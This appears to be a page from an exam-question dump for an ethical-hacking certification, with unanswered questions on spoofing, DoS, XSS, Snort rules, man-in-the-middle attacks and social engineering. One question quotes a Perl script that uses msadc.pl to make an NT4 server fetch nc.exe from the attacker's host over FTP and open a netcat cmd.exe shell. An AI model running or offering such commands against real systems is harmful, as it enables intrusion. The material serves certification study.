PrepAway - Latest Free Exam Questions & Answers

Tag: 312-50

What is a good example of a programming error that Bob can use to explain to the management how encryption wil

21 comments

Bob has a good understanding of cryptography, having worked with it for many years. Cryptography is used to secure data from specific threats, but it does not secure the application from coding errors. It can provide data privacy; integrity and enable strong authentication but it cannot mitigate programming errors. What is a good example of a programming error that Bob can use to explain to the management how encryption will not address all their security concerns?

What could be the reason?

Leave a comment

An attacker is attempting to telnet into a corporation’s system in the DMZ. The attacker doesn’t want to get caught and is spoofing his IP address. After numerous tries he remains unsuccessful in connecting to the system. The attacker rechecks that the target system is actually listening on Port 23 and he verifies it with both nmap and hping2. He is still unable to connect to the target system. What could be the reason?

What type of Denial of Service attack is represented here?

Leave a comment

Attacker forges a TCP/IP packet, which causes the victim to try opening a connection with itself. This causes the system to go into an infinite loop trying to resolve this unexpected connection. Eventually, the connection times out, but during this resolution, the machine appears to hang or become very slow. The attacker sends such packets on a regular basis to slow down the system.
Unpatched Windows XP and Windows Server 2003 machines are vulnerable to these attacks. What type of Denial of Service attack is represented here?

What vulnerability is detected in the web application here?

Leave a comment

While testing web applications, you attempt to insert the following test script into the search area on the company’s web site:
alert(‘Testing Testing Testing’)
Afterwards, when you press the search button, a pop up box appears on your screen with the text “Testing Testing Testing”. What vulnerability is detected in the web application here?

Study the snort rule given below and interpret the rule.alert tcp any any –> 192.168.1.0/24 111 (cont

One comment

Study the snort rule given below and interpret the rule.
alert tcp any any –> 192.168.1.0/24 111 (content:”|00 01 86 a5|”; msg: “mountd access”;)

What would you call this attack?

Leave a comment

Eric has discovered a fantastic package of tools named Dsniff on the Internet. He has learned how to use these tools in his lab and is now ready for real world exploitation. He was able to effectively intercept communications between two entities and establish credentials with both sides of the connections. The two remote ends of the communication never notice that Eric was relaying the information between the two. What would you call this attack?

exe"");What kind of exploit is indicated by this script?

Leave a comment

You have been using the msadc.pl attack script to execute arbitrary commands on an NT4 web server. While it is effective, you find it tedious to perform extended functions. On further research you come across a perl script that runs the following msadc functions:
system(“perl msadc.pl -h $host -C “echo open $your >sasfile””);
system(“perl msadc.pl -h $host -C “echo $user>>sasfile””);
system(“perl msadc.pl -h $host -C “echo $pass>>sasfile””);
system(“perl msadc.pl -h $host -C “echo bin>>sasfile””);
system(“perl msadc.pl -h $host -C “echo get nc.exe>>sasfile””);
system(“perl msadc.pl -h $host -C “echo get hacked.html>>sasfile””);
system(“perl msadc.pl -h $host -C “echo quit>>sasfile””);
system(“perl msadc.pl -h $host -C “ftp -s:sasfile””);
$o=; print “Opening …n”;
system(“perl msadc.pl -h $host -C “nc -l -p $port -e cmd.exe””);
What kind of exploit is indicated by this script?

Sabotage, Advertising and Covering are the three stages of _____

Leave a comment

Sabotage, Advertising and Covering are the three stages of _____


Page 59 of 150« First...102030...5758596061...708090...Last »